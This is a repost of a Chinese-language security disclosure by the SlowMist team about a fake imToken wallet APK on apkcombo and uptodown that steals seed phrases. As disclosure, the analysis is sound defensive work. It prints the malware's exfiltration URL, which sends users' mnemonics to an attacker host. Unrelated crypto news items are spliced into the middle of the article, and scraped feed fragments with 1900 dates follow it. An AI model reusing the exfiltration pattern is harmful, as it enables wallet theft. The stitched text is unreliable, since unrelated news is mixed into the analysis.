慢霧安全團隊建議使用錢包、交易所時請認準官方下載渠道并從多方進行驗證。
原文:https://foresightnews.pro/article/h5Detail/31716
作者:山&耀
轉自:ForesightNews
背景
基于區塊鏈技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。
當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包「登錄」;這與我們傳統意義上的「登錄」不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行「登錄」,我們可以看到「登錄」錢包時顯示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而錢包是你在Web3世界中的唯一通行證。
Web3社區構建平臺Galxe集成LayerZero:金色財經報道,Web3社區構建平臺Galxe在社交媒體表示,全鏈互操作協議LayerZero已經整合Galxe,3個合作伙伴將通過在Galxe上開展活動。[2023/8/13 16:23:13]
俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。
在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?
網站分析
Web3分發平臺MetaZone完成300萬美元融資:5月31日消息,Web3 數字內容和應用分發平臺 MetaZone 宣布完成 300 萬美元種子輪融資,專注于元宇宙領域投資的兩家機構 Sfermion 和 CMT Digital 共同領投,Tess Ventures、IOSG Ventures、IVC (Infinity Ventures Crypto)、Polygon Studios、MHC Digital 和 LucidBlue Ventures 參投。
MetaZone 允許創作者和開發者鑄造 NFT 的 3D 數字內容和并在元宇宙分發,每個創作者的 META 都被分配了一個代表其價值、所有權和訪問權的 NFT。這些 NFT 可以購買并用于在數字土地上安裝應用程序,供該土地的所有者和訪客使用。[2023/5/31 11:49:13]
鑒于下載途徑眾多,我們今天以apkcombo為例看看,apkcombo是一個第三方應用市場,它提供的應用據官方說大部分來源于其他正規應用商店,但事實是否真如官方所說呢?
巨人網絡:子公司出資100萬美元認購web3.0開放式基金DeFiance股份:5月11日消息,巨人網絡今日發布公告稱,公司全資子公司Giant Investment于5月10日與DeFiance簽訂《認購協議》,Giant Investment擬以自有資金出資100萬美元認購DeFiance的股份,成為DeFiance的股東。DeFiance主要投資互聯網3.0領域的數字資產、去中心化技術及基礎設施。[2023/5/11 14:58:02]
我們先看下apkcombo的流量有多大:
據數據統計站點similarweb統計,apkcombo站點:
全球排名:1,809國家排名:7,370品類排名:168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:
Mark Cuban旗下Web3娛樂平臺Fireside任命新高管以進軍體育和電子競技市場:10月8日消息,NBA達拉斯獨行俠隊老板Mark Cuban旗下Web3娛樂平臺Fireside任命前World Wrestling Entertainment(WWE)娛樂關系副總裁Kevin Endsley擔任體育、游戲和新聞合作伙伴關系負責人,旨在將業務拓展到體育和電子競技市場。
此前報道,Fireside于今年五月與以太坊側鏈SKALE合作推出了一項價值1億美元的加密貨幣創作者基金。(Recentlyheard)[2022/10/8 12:49:27]
那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:https://play.google.com/store/apps/details?id=im.token.app
加密和Web 3社區對BuzzFeed人肉搜索BAYC創始人身份表達不滿:2月7日消息,美國互聯網媒體和娛樂公司 Buzzfeed 近日公布了無聊猿BAYC 兩位聯合創始人Gargamel和Gordon Goner的真實身份,分別是:32 歲的作家兼編輯 Greg Solano 和 35 歲的 Wylie Aronow,但此舉引發了加密和 Web 3 社區的不滿,他們抨擊相關報道是人肉搜索,而不是適當的新聞消息。知名 Twitter 加密大 VCobie 在推文中直指 Buzzfeed 是典型的垃圾,相關報道是為了點擊和廣告收入而對當事人進行人肉搜索,而 Messari 創始人 Ryan Selkis 也對 Buzzfeed 的行為表達了憤怒。
不過,發表相關文章的 Buzzfeed 記者 Kate Notopoulos 辯稱道:在傳統商業世界中,公司的首席執行官或創始人使用真實姓名而不是化名是有原因的,BAYC 背后的人正在吸引投資者并經營一家潛在價值達到數十億美元的企業,如果你不知道他們是誰,如果出現問題又該如何追究他們的責任?[2022/2/7 9:35:25]
由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為:https://apkcombo.com/downloader/#package=im.token.app
上圖我們可以發現,apkcombo提供的版本為24.9.11,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。
在編寫本文時imToken錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。
如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。
同時我們發現類似的下載站還有如:uptodown下載地址:https://imtoken.br.uptodown.com/android
我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:
錢包分析
在之前我們已經分析過不少假錢包的案例,如:2021-11-24我們披露:《慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。
我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:
根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:
https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>
看下圖,最早的「api.funnel.rocks」證書出現在2022-06-03,也就是攻擊開始的大概時間:
俗話說一圖勝千言,最后我們畫一個流程圖:
總結
目前這種騙局活動不僅活躍,甚至有擴大范圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。
同時,如需使用錢包,請務必認準以下主流錢包App官方網址:
imToken錢包:https://token.im/TokenPocket錢包:https://www.tokenpocket.pro/TronLink錢包:https://www.tronlink.org/比特派錢包:https://bitpie.com/MetaMask錢包:https://metamask.io/TrustWallet:https://trustwallet.com/請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。
致謝:感謝在溯源過程中imToken官方提供的驗證支持。
由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。
?
XRP價格預測:在過去的兩天里,加密貨幣市場出現了大幅上漲,這很可能與另一起美國銀行危機有關。與加密貨幣投資者在3月中旬的經歷類似,第一共和國銀行現在面臨大量資金流出,促使市場參與者更多地轉向加.
1900/1/1 0:00:00原文標題:《DeveloperReportLiveDataAnnouncement》原文作者:ElectricCapital原文編譯:Kate,Marsbit自2019年發布第一份報告以來.
1900/1/1 0:00:004月25日消息,在一年的加息打擊下,美國經濟降溫的跡象終于開始顯現。3月份美國新屋開工數下跌0.8%。美國就業市場顯示出持續降溫的跡象,申請失業救濟人數有史以來首次連續三周上升.
1900/1/1 0:00:00親愛的用戶:為提升市場的有效流動性和交易體驗,幣安將于2023年05月05日14:30調整BNXUSDTU本位永續合約交易對的最小價格精度.
1900/1/1 0:00:004月25日消息,美國破產法官MartinGlenn發布一份關于CelsiusNetwork的法律文件,并確定了一份時間表.
1900/1/1 0:00:00免責聲明:所提供的信息不構成財務、投資、交易或其他類型的建議,僅是作者的意見。12小時市場結構看跌,阻力匯合在342美元.
1900/1/1 0:00:00